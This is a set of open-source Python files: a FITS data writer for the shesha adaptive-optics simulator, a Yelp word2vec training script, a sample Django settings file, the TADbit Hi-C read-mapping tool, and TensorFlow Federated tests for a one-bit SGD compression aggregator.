influ_fct = sup.config.p_dms[dm_id].get_influ().astype(np.float64)
else :
influ_fct = sup.config.p_dms[dm_id].get_influ()[:,:,influ_index].astype(np.float64)
hdu = fits.ImageHDU( influ_fct, name=hdu_name)
return hdu
def write_data(file_name, sup, *, wfss_indices=None, dms_indices=None,
controller_id=0, influ=0, compose_type="controller"):
""" Write data for yao compatibility
write into a single fits:
* number of valide subapertures
* number of actuators
* subapertures position (2-dim array x,y) in meters centered
* actuator position (2-dim array x,y) in pixels starting from 0
* interaction matrix (2*nSubap , nactu)
* command matrix (nacy , 2*nSubap)
Args:
file_name : (str) : data file name
sup : (compasSSupervisor) : supervisor
Kargs:
wfss_indices : (list[int]) : optional, default all, list of the wfs indices to include
dms_indices : (list[int]) : optional, default all, list of the DM indices to include
controller_id : (int) : optional, index of the controller passed to yao
influ : (int) : optional, actuator index for the influence function
compose_type : (str) : optional, possibility to specify split tomography case ("controller" or "splitTomo")
"""
print("writing data to" + file_name)
hdul=fits.HDUList([])
# setting list of wfs and dm
conf = sup.config
if(wfss_indices is None):
wfss_indices = np.arange(len(conf.p_wfss))
if(dms_indices is None):
dms_indices = []
for i in range(len(conf.p_dms)):
if( conf.p_dms[i].type != "tt"):
dms_indices.append(i)
#cout the number of lgs
n_lgs = 0
for i in wfss_indices :
if(conf.p_wfss[i].get_gsalt() > 0):
n_lgs += 1
#primary hdu contains only keywords for sanity check
hdu = fits.PrimaryHDU(np.zeros(1,dtype=np.int32))
hdu.header["DIAM"] = conf.p_tel.get_diam()
hdu.header["COBS"] = conf.p_tel.get_cobs()
hdu.header["NLGS"] = n_lgs
hdu.header["NNGS"] = len(wfss_indices) - n_lgs
hdu.header["NDM" ] = len(dms_indices)
hdu.header["PIXSIZE"] = conf.p_geom.get_pixsize()
#add primary hdu to list
hdul.append(hdu)
# add wfss
for i in wfss_indices:
hdul.append( wfs_to_fits_hdu(sup, i))
# add dm
for i in dms_indices:
hdul.append(dm_to_fits_hdu(sup, i))
hdul.append(dm_influ_to_fits_hdu(sup, i, influ_index = influ))
if(controller_id > -1):
# IMAT
interaction_mat=imat.compose_imat(sup, compose_type=compose_type,
controller_id=controller_id)
hdu_imat=fits.ImageHDU(interaction_mat,name="IMAT")
# CMAT
hdu_cmat=fits.ImageHDU(sup.rtc.get_command_matrix(controller_id),
name="CMAT")
print("\t* number of subaperture per WFS")
print("\t* subapertures position")
print("\t* number of actuator per DM")
print("\t* actuators position")
print("\t* Imat")
print("\t* Cmat")
hdul.writeto(file_name, overwrite=1)
|
ANR-COMPASS/shesha
|
shesha/util/writers/common/fits.py
|
Python
|
gpl-3.0
| 5,305 | 0.00754 |
"""
Compute WordVectors using Yelp Data
"""
from gensim.models.word2vec import Word2Vec
from util.language import detect_language, tokenize_text
from data_handling import get_reviews_data
# Set to true for zero in in English reviews. Makes the process much slower
FILTER_ENGLISH = True
# Name for output w2v model file
OUTPUT_MODEL_FILE = "w2v_yelp_100_alpha_0.025_window_4"
PICKLED_DATA = "/home/alfredo/deep-nlp/data/reviews.pickle."
NUM_PARTITIONS = 2 # Use all data
reviews_texts, _, _, _, _ = get_reviews_data(range(1, NUM_PARTITIONS), PICKLED_DATA)
# Each review will be considered a sentence
sentences = []
for num, text in enumerate(reviews_texts):
if num % 10000 == 0:
print "%d out of %d reviews read" % (num, len(reviews_texts))
if FILTER_ENGLISH:
if detect_language(text) == u"english":
sentences.append(tokenize_text(text))
else:
sentences.append(text)
# Build a w2v model
w2v = Word2Vec(sentences=sentences, size=100, alpha=0.025, window=4, min_count=2, sample=1e-5, workers=4, negative=10)
w2v.save(OUTPUT_MODEL_FILE)
|
lukedeo/fancy-cnn
|
datasets/yelp/yelp_w2v.py
|
Python
|
mit
| 1,086 | 0.003683 |
# Django settings for python project.
DEBUG = True
import logging
LOG_LEVEL = logging.INFO
if DEBUG:
LOG_LEVEL = logging.DEBUG
logging.basicConfig(
level = LOG_LEVEL,
format = '[%(asctime)s %(name)s %(levelname)s] %(message)s',
)
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASE_ENGINE = '' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'ado_mssql'.
DATABASE_NAME = '' # Or path to database file if using sqlite3.
DATABASE_USER = '' # Not used with sqlite3.
DATABASE_PASSWORD = '' # Not used with sqlite3.
DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.
DATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.
# Local time zone for this installation. Choices can be found here:
# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
# although not all variations may be possible on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = '!q2sh7ue8^=bu&wj9tb9&4fx^dayk=wnxo^mtd)xmw1y2)6$w$'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
# 'django.template.loaders.eggs.load_template_source',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.doc.XViewMiddleware',
)
ROOT_URLCONF = 'python.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
)
|
GdZ/scriptfile
|
software/googleAppEngine/lib/PyAMF/doc/tutorials/examples/actionscript/bytearray/python/settings.py
|
Python
|
mit
| 2,999 | 0.003334 |
"""
information needed
- path to FASTQ
- path to reference genome
- path to indexed reference genome
- read number (1/2)
- restriction enzyme used
- species name
- chromosome names (optional)
- descriptive fields (optional, e.g. --descr=flowcell:C68AEACXX,lane:4,index:24nf)
mapping strategy
- iterative/fragment
- mapper
"""
from __future__ import print_function
from os import path, remove, system
from string import ascii_letters
from random import random
from shutil import copyfile
from multiprocessing import cpu_count
from subprocess import PIPE, STDOUT, Popen
from pickle import load, UnpicklingError
from argparse import HelpFormatter
from traceback import print_exc
import logging
import sqlite3 as lite
import time
from pytadbit.mapping.restriction_enzymes import RESTRICTION_ENZYMES, identify_re
from pytadbit.utils.fastq_utils import quality_plot
from pytadbit.utils.file_handling import which, mkdir, is_fastq
from pytadbit.mapping.full_mapper import full_mapping, fast_fragment_mapping
from pytadbit.parsers.genome_parser import parse_fasta
from pytadbit.utils.sqlite_utils import get_path_id, add_path, print_db, retry
from pytadbit.utils.sqlite_utils import get_jobid, already_run, digest_parameters
from pytadbit import get_dependencies_version
DESC = "Map Hi-C reads and organize results in an output working directory"
def run(opts):
check_options(opts)
launch_time = time.localtime()
# hash that gonna be append to output file names
param_hash = digest_parameters(opts, get_md5=True)
# create tmp directory
if not opts.tmp:
temp_dir = opts.workdir + '_tmp_r%d_%s' % (opts.read, param_hash)
else:
temp_dir = path.join(opts.tmp,
'TADbit_tmp_r%d_%s' % (opts.read, param_hash))
# QC plot
fig_path = path.join(opts.workdir,
'%s_%s_%s.png' % (path.split(opts.fastq)[-1],
'-'.join(map(str, opts.renz)), param_hash))
logging.info('Generating Hi-C QC plot')
dangling_ends, ligated = quality_plot(opts.fastq, r_enz=opts.renz,
nreads=100000, paired=False,
savefig=fig_path)
for renz in dangling_ends:
logging.info(' - Dangling-ends (sensu-stricto): %.3f%%', dangling_ends[renz])
for renz in ligated:
logging.info(' - Ligation sites: %.3f%%', ligated[renz])
if opts.skip_mapping:
save_to_db(opts, dangling_ends, ligated, fig_path, [], launch_time, time.localtime())
return
# Mapping
if opts.fast_fragment:
mkdir(path.join(opts.workdir, '03_filtered_reads'))
logging.info('parsing genomic sequence')
try:
# allows the use of pickle genome to make it faster
genome_seq = load(open(opts.genome[0],'rb'))
except (UnpicklingError, KeyError):
genome_seq = parse_fasta(opts.genome)
logging.info('mapping %s and %s to %s', opts.fastq, opts.fastq2, opts.workdir)
outfiles = fast_fragment_mapping(opts.index, opts.fastq, opts.fastq2,
opts.renz, genome_seq,
path.join(opts.workdir, '03_filtered_reads',
'all_r1-r2_intersection_%s.tsv' % param_hash),
clean=not opts.keep_tmp, get_nread=True,
mapper_binary=opts.mapper_binary,
mapper_params=opts.mapper_param, suffix=param_hash,
temp_dir=temp_dir, nthreads=opts.cpus)
else:
logging.info('mapping %s read %s to %s', opts.fastq, opts.read, opts.workdir)
outfiles = full_mapping(opts.index, opts.fastq,
path.join(opts.workdir,
'01_mapped_r%d' % (opts.read)), mapper=opts.mapper,
r_enz=opts.renz, temp_dir=temp_dir, nthreads=opts.cpus,
frag_map=not opts.iterative, clean=not opts.keep_tmp,
windows=opts.windows, get_nread=True, skip=opts.skip,
suffix=param_hash, mapper_binary=opts.mapper_binary,
mapper_params=opts.mapper_param)
# adjust line count
if opts.skip:
for i, (out, _) in enumerate(outfiles[1:], 1):
outfiles[i] = out, outfiles[i-1][1] - sum(1 for _ in open(outfiles[i-1][0]))
finish_time = time.localtime()
# save all job information to sqlite DB
save_to_db(opts, dangling_ends, ligated, fig_path, outfiles, launch_time, finish_time)
try:
save_to_db(opts, dangling_ends, ligated, fig_path, outfiles, launch_time, finish_time)
except Exception as e:
# release lock
remove(path.join(opts.workdir, '__lock_db'))
print_exc()
exit(1)
# write machine log
try:
while path.exists(path.join(opts.workdir, '__lock_log')):
time.sleep(0.5)
open(path.join(opts.workdir, '__lock_log'), 'a').close()
with open(path.join(opts.workdir, 'trace.log'), "a") as mlog:
mlog.write('\n'.join([
('# MAPPED READ%s\t%d\t%s' % (opts.read, num, out))
for out, num in outfiles]) + '\n')
# release lock
try:
remove(path.join(opts.workdir, '__lock_log'))
except OSError:
pass
except Exception as e:
# release lock
remove(path.join(opts.workdir, '__lock_db'))
print_exc()
exit(1)
# clean
if not opts.keep_tmp:
logging.info('cleaning temporary files')
system('rm -rf ' + temp_dir)
def check_options(opts):
if not opts.mapper_binary:
if opts.mapper == 'gem':
opts.mapper_binary = 'gem-mapper'
else:
opts.mapper_binary = opts.mapper
opts.mapper_binary = which(opts.mapper_binary)
if not opts.mapper_binary:
raise Exception('\n\nERROR: Mapper binary not found, for GEM install it from:'
'\nhttps://sourceforge.net/projects/gemlibrary/files/gem-library/Binary%20pre-release%202/'
'\n - Download the GEM-binaries-Linux-x86_64-core_i3 if'
'have a recent computer, the '
'GEM-binaries-Linux-x86_64-core_2 otherwise\n - '
'Uncompress with "tar xjvf GEM-binaries-xxx.tbz2"\n - '
'Copy the binary gem-mapper to /usr/local/bin/ for '
'example (somewhere in your PATH).\n\nNOTE: GEM does '
'not provide any binary for MAC-OS.')
opts.gem_version = 0
if opts.mapper == 'gem':
opts.gem_version = None
try:
out, _ = Popen([opts.mapper_binary,'--version'], stdout=PIPE,
stderr=STDOUT, universal_newlines=True).communicate()
opts.gem_version = int(out[1])
except ValueError as e:
opts.gem_version = 2
print('Falling to gem v2')
if opts.fast_fragment:
if opts.gem_version < 3:
raise Exception('ERROR: Fast fragment mapping needs GEM v3')
if not opts.fastq2 or not path.exists(opts.fastq2):
raise Exception('ERROR: Fast fragment mapping needs both fastq files. '
'Please specify --fastq2')
if opts.read != 0:
raise Exception('ERROR: Fast fragment mapping needs to be specified with --read 0')
if not opts.genome: raise Exception('ERROR: Fast fragment mapping needs '
'the genome parameter.')
# check RE name
if opts.renz == ['CHECK']:
print('\nSearching for most probable restriction enzyme in file: %s' % (opts.fastq))
try:
pat, enz, pv = identify_re(opts.fastq, nreads=100000)
print(' -> Most probable digested site: %s (pv: %f)' % (pat, pv))
print(' -> Enzymes matching: %s' % (', '.join(enz)))
except ValueError:
print(' -> Nothing found...')
exit()
for n, renz in enumerate(opts.renz):
if renz == 'NONE':
opts.renz[n] = None
continue
try:
_ = RESTRICTION_ENZYMES[renz]
except KeyError:
print ('\n\nERROR: restriction enzyme %s not found.' % (renz)
+ 'Use one of:\n\n'
+ ' '.join(sorted(RESTRICTION_ENZYMES)) + '\n\n')
raise KeyError()
except AttributeError:
pass
# check skip
if not path.exists(opts.workdir) and opts.skip:
print ('WARNING: can use output files, found, not skipping...')
opts.skip = False
# number of cpus
if opts.cpus == 0:
opts.cpus = cpu_count()
else:
opts.cpus = min(opts.cpus, cpu_count())
# check paths
if opts.mapper == 'gem' and not path.exists(opts.index):
raise IOError('ERROR: index file not found at ' + opts.index)
if not path.exists(opts.fastq):
raise IOError('ERROR: FASTQ file not found at ' + opts.fastq)
if not is_fastq(opts.fastq):
raise IOError(('ERROR: FASTQ file %s wrong format, check') % (opts.fastq))
try:
opts.windows = [[int(i) for i in win.split(':')]
for win in opts.windows]
except TypeError:
pass
mkdir(opts.workdir)
# write log
# if opts.mapping_only:
log_format = '[MAPPING {} READ{}] %(message)s'.format(opts.fastq, opts.read)
# else:
# log_format = '[DEFAULT] %(message)s'
# reset logging
logging.getLogger().handlers = []
try:
print('Writing log to ' + path.join(opts.workdir, 'process.log'))
logging.basicConfig(level=logging.INFO,
format=log_format,
filename=path.join(opts.workdir, 'process.log'),
filemode='a+')
except IOError:
logging.basicConfig(level=logging.DEBUG,
format=log_format,
filename=path.join(opts.workdir, 'process.log2'),
filemode='a+')
# to display log on stdout also
logging.getLogger().addHandler(logging.StreamHandler())
# write version log
vlog_path = path.join(opts.workdir, 'TADbit_and_dependencies_versions.log')
dependencies = get_dependencies_version()
if not path.exists(vlog_path) or open(vlog_path).readlines() != dependencies:
logging.info('Writing versions of TADbit and dependencies')
vlog = open(vlog_path, 'w')
vlog.write(dependencies)
vlog.close()
# check mapper extra options
if opts.mapper_param:
if (len(opts.mapper_param) == 1
and ('-' in opts.mapper_param[0] or
'--' in opts.mapper_param[0])):
# Single string surrounded by quotes
opts.mapper_param = opts.mapper_param[0].split()
else:
opts.mapper_param = dict([o.split(':') for o in opts.mapper_param])
else:
opts.mapper_param = {}
if opts.mapper == 'gem' and opts.gem_version < 3:
gem_valid_option = set(["granularity", "q", "quality-format",
"gem-quality-threshold", "mismatch-alphabet",
"m", "e", "min-matched-bases",
"max-big-indel-length", "s", "strata-after-best",
"fast-mapping", "unique-mapping", "d", "D",
"allow-incomplete-strata", "max-decoded-matches",
"min-decoded-strata", "p", "paired-end-alignment",
"b", "map-both-ends", "min-insert-size",
"max-insert-size", "E", "max-extendable-matches",
"max-extensions-per-match", "unique-pairing"])
for k in opts.mapper_param:
if not k in gem_valid_option:
raise NotImplementedError(('ERROR: option "%s" not a valid GEM option'
'or not suported by this tool.') % k)
# create empty DB if don't exists
dbpath = path.join(opts.workdir, 'trace.db')
open(dbpath, 'a').close()
# for lustre file system....
if 'tmpdb' in opts and opts.tmpdb:
dbdir = opts.tmpdb
# tmp file
dbfile = 'trace_%s' % (''.join([ascii_letters[int(random() * 52)]
for _ in range(10)]))
opts.tmpdb = path.join(dbdir, dbfile)
try:
copyfile(path.join(opts.workdir, 'trace.db'), opts.tmpdb)
except IOError:
pass
# check if job already run using md5 digestion of parameters
if already_run(opts):
if 'tmpdb' in opts and opts.tmpdb:
remove(path.join(dbdir, dbfile))
exit('WARNING: exact same job already computed, see JOBs table above')
@retry(lite.OperationalError, tries=20, delay=2)
def save_to_db(opts, dangling_ends, ligated, fig_path, outfiles, launch_time, finish_time):
"""
write little DB to keep track of processes and options
"""
if 'tmpdb' in opts and opts.tmpdb:
# check lock
while path.exists(path.join(opts.workdir, '__lock_db')):
time.sleep(0.5)
# close lock
open(path.join(opts.workdir, '__lock_db'), 'a').close()
# tmp file
dbfile = opts.tmpdb
try: # to copy in case read1 was already mapped for example
copyfile(path.join(opts.workdir, 'trace.db'), dbfile)
except IOError:
pass
else:
dbfile = path.join(opts.workdir, 'trace.db')
con = lite.connect(dbfile)
with con:
# check if table exists
cur = con.cursor()
cur.execute("""SELECT name FROM sqlite_master WHERE
type='table' AND name='MAPPED_INPUTs'""")
if not cur.fetchall():
try:
cur.execute("""
create table PATHs
(Id integer primary key,
JOBid int, Path text, Type text,
unique (Path))""")
except lite.OperationalError:
pass # may append when mapped files cleaned
cur.execute("""
create table JOBs
(Id integer primary key,
Parameters text,
Launch_time text,
Finish_time text,
Type text,
Parameters_md5 text,
unique (Parameters_md5))""")
cur.execute("""
create table MAPPED_INPUTs
(Id integer primary key,
PATHid int,
Entries int,
Trim text,
Frag text,
Read int,
Enzyme text,
Dangling_Ends text,
Ligation_Sites text,
WRKDIRid int,
MAPPED_OUTPUTid int,
INDEXid int,
unique (PATHid,Entries,Read,Enzyme,WRKDIRid,MAPPED_OUTPUTid,INDEXid))""")
try:
parameters = digest_parameters(opts, get_md5=False)
param_hash = digest_parameters(opts, get_md5=True)
cur.execute("""
insert into JOBs
(Id , Parameters, Launch_time, Finish_time, Type , Parameters_md5)
values
(NULL, '%s', '%s', '%s', 'Map', '%s')
""" % (parameters,
time.strftime("%d/%m/%Y %H:%M:%S", launch_time),
time.strftime("%d/%m/%Y %H:%M:%S", finish_time), param_hash))
except lite.IntegrityError:
pass
jobid = get_jobid(cur)
add_path(cur, opts.workdir, 'WORKDIR', jobid)
add_path(cur, opts.fastq , 'MAPPED_FASTQ' , jobid, opts.workdir)
add_path(cur, opts.index , 'INDEX' , jobid, opts.workdir)
add_path(cur, fig_path , 'FIGURE' , jobid, opts.workdir)
for i, (out, num) in enumerate(outfiles):
try:
window = opts.windows[i]
except IndexError:
window = opts.windows[-1]
except TypeError:
window = 'None'
add_path(cur, out,'2D_BED' if opts.read == 0 else 'SAM/MAP', jobid, opts.workdir)
frag = ('none' if opts.iterative else 'fast_frag' if opts.read == 0
else 'frag' if i==len(outfiles) - 1 else 'full')
try:
cur.execute("""
insert into MAPPED_INPUTs
(Id , PATHid, Entries, Trim, Frag, Read, Enzyme, Dangling_Ends, Ligation_Sites, WRKDIRid, MAPPED_OUTPUTid, INDEXid)
values
(NULL, %d, %d, '%s', '%s', %d, '%s', '%s', '%s', %d, %d, %d)
""" % (get_path_id(cur, opts.fastq, opts.workdir), num, window, frag,
opts.read, '-'.join(map(str, opts.renz)),
' '.join('%s:%.3f%%' % (r, dangling_ends.get(r, float('nan'))) for r in opts.renz),
' '.join('%s:%.3f%%' % ('-'.join(r), ligated.get(r, float('nan'))) for r in ligated),
get_path_id(cur, opts.workdir),
get_path_id(cur, out, opts.workdir),
get_path_id(cur, opts.index, opts.workdir)))
except lite.IntegrityError:
pass
print_db(cur, 'MAPPED_INPUTs')
print_db(cur, 'PATHs' )
print_db(cur, 'JOBs' )
if 'tmpdb' in opts and opts.tmpdb:
# copy back file
copyfile(dbfile, path.join(opts.workdir, 'trace.db'))
remove(dbfile)
# release lock
try:
remove(path.join(opts.workdir, '__lock_db'))
except OSError:
pass
def get_options_from_cfg(cfg_file, opts):
raise NotImplementedError()
def populate_args(parser):
"""
parse option from call
"""
parser.formatter_class=lambda prog: HelpFormatter(prog, width=95,
max_help_position=27)
glopts = parser.add_argument_group('General options')
mapper = parser.add_argument_group('Mapping options')
descro = parser.add_argument_group('Descriptive, optional arguments')
# glopts.add_argument('--cfg', dest='cfg', metavar="PATH", action='store',
# default=None, type=str,
# help='path to a configuration file with predefined ' +
# 'parameters')
glopts.add_argument('--skip_mapping', dest='skip_mapping', action='store_true',
default=False,
help='generate a Hi-C specific quality plot from FASTQ and exits')
glopts.add_argument('-w', '--workdir', dest='workdir', metavar="PATH",
action='store', default=None, type=str, required=True,
help='path to an output folder.')
glopts.add_argument('--fastq', dest='fastq', metavar="PATH", action='store',
default=None, type=str, required=True,
help='path to a FASTQ files (can be compressed files)')
glopts.add_argument('--fastq2', dest='fastq2', metavar="PATH", action='store',
default=None, type=str, required=False,
help='''(beta) path to a FASTQ file of read 2 (can be compressed
files). Needed for fast_fragment''')
glopts.add_argument('--index', dest='index', metavar="PATH",
type=str, required=True,
help='''paths to file(s) with indexed FASTA files of the
reference genome.''')
glopts.add_argument('--genome', dest='genome', metavar="PATH", nargs='+',
type=str,
help='''paths to file(s) with FASTA files of the
reference genome. Needed for fast_fragment mapping.
If many, files will be concatenated.
I.e.: --genome chr_1.fa chr_2.fa
In this last case, order is important or the rest of the
analysis. Note: it can also be the path to a previously
parsed genome in pickle format.''')
glopts.add_argument('--read', dest='read', metavar="INT",
type=int, required=True,
help='read number')
glopts.add_argument('--renz', dest='renz', metavar="STR",
type=str, required=True, nargs='+',
help='''restriction enzyme name(s). Use "--renz CHECK"
to search for most probable and exit; and use
"--renz NONE" to avoid using RE site information.''')
glopts.add_argument('--chr_name', dest='chr_name', metavar="STR", nargs='+',
default=[], type=str,
help='''[fasta header] chromosome name(s). Used in the
same order as data.''')
glopts.add_argument('--tmp', dest='tmp', metavar="PATH", action='store',
default=None, type=str,
help='''path to a temporary directory (default next to
"workdir" directory)''')
glopts.add_argument('--tmpdb', dest='tmpdb', action='store', default=None,
metavar='PATH', type=str,
help='''if provided uses this directory to manipulate the
database''')
glopts.add_argument('--noX', action='store_true', help='no display server (X screen)')
mapper.add_argument('--iterative', dest='iterative', default=False,
action='store_true',
help='''default mapping strategy is fragment based
use this flag for iterative mapping''')
mapper.add_argument('--fast_fragment', dest='fast_fragment', default=False,
action='store_true',
help='''(beta) use fast fragment mapping. Both fastq files are mapped using
fragment based mapping in GEM v3. The output file is an intersected
read file than can be used directly in tadbit filter
(no tadbit parse needed). Access to samtools is needed for
fast_fragment to work.
--fastq2 and --genome needs to be
specified and --read value should be 0.''')
mapper.add_argument('--windows', dest='windows', default=None,
nargs='+',
help='''defines windows to be used to trim the input
FASTQ reads, for example an iterative mapping can be defined
as: "--windows 1:20 1:25 1:30 1:35 1:40 1:45 1:50". But
this parameter can also be used for fragment based mapping
if for example pair-end reads are both in the same FASTQ,
for example: "--windows 1:50" (if the length of the reads
is 100). Note: that the numbers are both inclusive.''')
descro.add_argument('--species', dest='species', metavar="STR",
type=str,
help='species name')
descro.add_argument('--descr', dest='description', metavar="LIST", nargs='+',
type=str,
help='''extra descriptive fields each filed separated by
coma, and inside each, name and value separated by column:
--descr=cell:lymphoblast,flowcell:C68AEACXX,index:24nf''')
glopts.add_argument('--skip', dest='skip', action='store_true',
default=False,
help='[DEBUG] in case already mapped.')
glopts.add_argument('--keep_tmp', dest='keep_tmp', action='store_true',
default=False,
help='[DEBUG] keep temporary files.')
mapper.add_argument("-C", "--cpus", dest="cpus", type=int,
default=cpu_count(), help='''[%(default)s] Maximum
number of CPU cores available in the execution host.
If higher than 1, tasks with multi-threading
capabilities will enabled (if 0 all available)
cores will be used''')
mapper.add_argument('--mapper', dest='mapper', metavar="STR",
type=str, default='gem',
help='[%(default)s] mapper used, options are gem, bowtie2 or hisat2')
mapper.add_argument('--mapper_binary', dest='mapper_binary', metavar="STR",
type=str, default=None,
help='[%(default)s] path to mapper binary')
mapper.add_argument('--mapper_param', dest="mapper_param", type=str, default=0,
nargs='+',
help='''any parameter that could be passed to the GEM, BOWTIE2 or HISAT2
mapper. e.g. if we want to set the proportion of
mismatches to 0.05 and the maximum indel length to 10,
(in GEM v2 it would be: -e 0.05 --max-big-indel-length 10),
here we could write: "--mapper_param e:0.05
max-big-indel-length:10". For BOWTIE2, GEM3 and HISAT2 you can
also pass directly the parameters enclosed between quotes like:
--mapper_param "-e 0.05 --alignment-local-min-score 15"
IMPORTANT: some options are incompatible with 3C-derived experiments.''')
|
3DGenomes/tadbit
|
_pytadbit/tools/tadbit_map.py
|
Python
|
gpl-3.0
| 26,222 | 0.00492 |
# Copyright 2022, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
from absl.testing import parameterized
import tensorflow as tf
import tensorflow_federated as tff
from compressed_communication.aggregators.comparison_methods import one_bit_sgd
_test_integer_tensor_type = (tf.int32, (3,))
_test_float_struct_type = [(tf.float32, (2,)), (tf.float32, (3,))]
_test_float_tensor_type = (tf.float32, (3,))
class OneBitSGDComputationTest(tff.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_one_bit_sgd_properties(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
self.assertIsInstance(process, tff.templates.AggregationProcess)
server_state_type = tff.type_at_server(())
expected_initialize_type = tff.FunctionType(
parameter=None, result=server_state_type)
self.assert_types_equivalent(process.initialize.type_signature,
expected_initialize_type)
expected_measurements_type = tff.type_at_server(
collections.OrderedDict(
avg_bitrate=tf.float32,
avg_distortion=tf.float32))
expected_next_type = tff.FunctionType(
parameter=collections.OrderedDict(
state=server_state_type, value=tff.type_at_clients(value_type)),
result=tff.templates.MeasuredProcessOutput(
state=server_state_type,
result=tff.type_at_server(value_type),
measurements=expected_measurements_type))
self.assert_types_equivalent(process.next.type_signature,
expected_next_type)
@parameterized.named_parameters(
("integer_tensor", _test_integer_tensor_type),
("float_struct", _test_float_struct_type))
def test_one_bit_sgd_create_raises(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
self.assertRaises(ValueError, factory.create, value_type)
class OneBitSGDExecutionTest(tff.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_positive(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [tf.ones(value_type.shape, value_type.dtype)
for _ in range(2)]
expected_result = tf.ones(value_type.shape, value_type.dtype) * 2
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=0.0)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_negative(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [-1.0 * tf.ones(value_type.shape, value_type.dtype)
for _ in range(2)]
expected_result = tf.ones(value_type.shape, value_type.dtype) * -2
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=0.0)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_positive_negative(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[0.0, 2.0, -1.0] for _ in range(2)]
expected_result = [2.0, 2.0, -2.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_nonzero_threshold(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0] for _ in range(2)]
expected_result = [0.0, 0.0, 4.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_one_client(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0]]
expected_result = [0.0, 0.0, 2.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
